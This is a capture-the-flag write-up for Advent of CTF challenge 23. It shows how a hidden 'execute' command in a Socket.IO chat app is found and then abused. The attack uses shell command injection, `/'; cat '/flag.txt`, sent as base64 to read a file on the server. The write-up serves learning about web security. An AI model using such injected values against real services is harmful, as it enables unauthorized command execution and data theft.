Repo for my website
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

230 lines
6.4 KiB

+++
author = "Maik de Kruif"
title = "IRC"
subtitle = "Challenge 23 - AdventOfCTF"
date = 2021-03-16T20:52:38+01:00
description = "A writeup for challenge 23 of AdventOfCTF."
cover = "img/writeups/adventofctf/2020/497784f7a3314f8aa5b8464432e30bbe.png"
tags = [
"AdventOfCTF",
"challenge",
"ctf",
"hacking",
"writeup",
"web",
"websockets",
]
categories = [
"ctf",
"writeups",
"hacking",
]
+++
- Points: 2300
## Description
If all you do is talk, there are bound to be secret features. The flag is stored in /flag.txt.
Visit <https://23.adventofctf.com> to start the challenge.
## Recon
When opening the page, we're greeted with, what looks like, a chat screen. If we type a message in the message box and send it, it appears on the screen.
If we take a look at the source, we also find a bit of javascript:
```js
$(function () {
var socket = io();
$("form").submit(function () {
socket.emit("chat message", { message: $("#m").val() });
$("#m").val("");
return false;
});
socket.on("chat message", function (msg) {
console.log(msg.command);
if (msg.command === "code") {
$("#messages").append($("<li>").html("<pre>" + msg.message + "</pre>"));
} else {
$("#messages").append($("<li>").text(msg.message));
}
window.scrollTo(0, document.body.scrollHeight);
});
});
```
## Finding the vulnerability
From the JavaScript code we can see that the chat uses WebSockets. To take a deeper look at it, let's switch over to the network tab in Chrome and click on the request with the type "websocket".
{{< figure src="/img/writeups/adventofctf/2020/23/websocket.png" title="Websocket in Chrome DevTools" >}}
If we click on it, a tab with the messages sent on the websocket will open. We can see some numbers here, these are just heartbeat packets to keep the connection alive. Now, let's send a new message and have a look at what it actually sends/receives.
4 years ago
After sending the message, the following entries are added to the websocket message list.
```js
⬆42["chat message", {message: "Hi"}]
⬇42["chat message", {message: "Hi"}]
```
4 years ago
We can see the message contains two parts; the event name and the message itself. We also only see a message variable, while in the javascript code we also saw it looked for a `"command"`. Let's try to manually add it to the message.
### Manually sending a message
In Chrome (to my knowledge) we can't easily send a message on a websocket. We could use Burp Suit to do it but for this writeup I'll stick with Chrome. To send a message on the websocket, we need the `socket` variable from the javascript code. To get it, go to the `Sources` tab and click on `(index)`. Now click on line number 28 to add a breakpoint there. We choose this place as it will trigger a breakpoint just before a message gets sent and we thus have access to the socket variable.
{{< figure src="/img/writeups/adventofctf/2020/23/breakpoint.png" title="Javascipt breakpoint in Chrome" >}}
Now if we try to send a message, chrome will pause the page. The console will now also have the scope of the piece of code at the breakpoint. This means that if we enter `socket` in the console, will get the socket object back:
```js
> socket
< Socket {receiveBuffer: Array(0), sendBuffer: Array(0), ids: 0, acks: {}, flags: {}, }
```
Let's save this object to the global scope so we can always access it. To do this, let's enter the following code in the console:
```js
window.socket = socket;
```
We can then click the continue button or press `F8` to continue the script. To verify we still have access to the socket, we can try to send a message using the console. I used the following code for this:
```js
socket.emit("chat message", { message: "Hello" });
```
After running this, we also see the message pop up in the chat window.
### Sending a command
Because the code tries to read `msg.command`, let's try adding a command to the message. We can do that using the following code:
```js
socket.emit("chat message", {
message: "Hello",
command: "ls",
});
```
As we expect from the code, `"ls"` is printed to the console but nothing else seems to happen. Maybe the command does not exist, let's try the common `help` command.
```js
socket.emit("chat message", { message: "Hello", command: "help" });
```
This time it returns a different message: "Allowed message types are: help, execute and empty".
## Exploit
The `execute` command looks interesting, so let's take a further look at it.
```js
socket.emit("chat message", { message: "Hello", command: "execute" });
```
Upon sending it, the server returns "Invalid BASE64". This probably means it is trying to read base64 encoded data. But from where? Let's try replacing the message with a base64 encoded command.
```bash
> echo -n "ls" | base64 -w 0
bHM=⏎
```
```js
socket.emit("chat message", { message: "bHM=", command: "execute" });
```
This time we got a different result:
```text
ERR: Error: Command failed: /bin/ls 'ls'
ls: ls: No such file or directory
```
This means the backend is trying to list the contents of "ls", let's try again with a `/` as the message:
```bash
> echo -n "/" | base64 -w 0
Lw==⏎
```
```js
socket.emit("chat message", { message: "Lw==", command: "execute" });
```
This returns the following:
```text
STDOUT: apps
bin
dev
etc
flag.txt
home
lib
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
```
The only thing left is reading the `flag.txt` file. From the ls error we know the backend executes the following: `/bin/ls '[MESSAGE]'`. This means we have to construct a command that works around the quotes around our input. An example for the input would be `/'; cat '/flag.txt` as this makes the command become the following:
```bash
/bin/ls '/'; cat '/flag.txt'
```
Let's try that.
```bash
> echo -n "/'; cat '/flag.txt" | base64 -w 0
Lyc7IGNhdCAnL2ZsYWcudHh0⏎
```
```js
socket.emit("chat message", {
message: "Lyc7IGNhdCAnL2ZsYWcudHh0",
command: "execute",
});
```
This will give us the following output:
```text
STDOUT: apps
bin
dev
etc
flag.txt
home
lib
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
NOVI{i_hacked_websockets_and_1_am_still_s@ne}
```
## Solution
We got the flag! It is `NOVI{i_hacked_websockets_and_1_am_still_s@ne}`.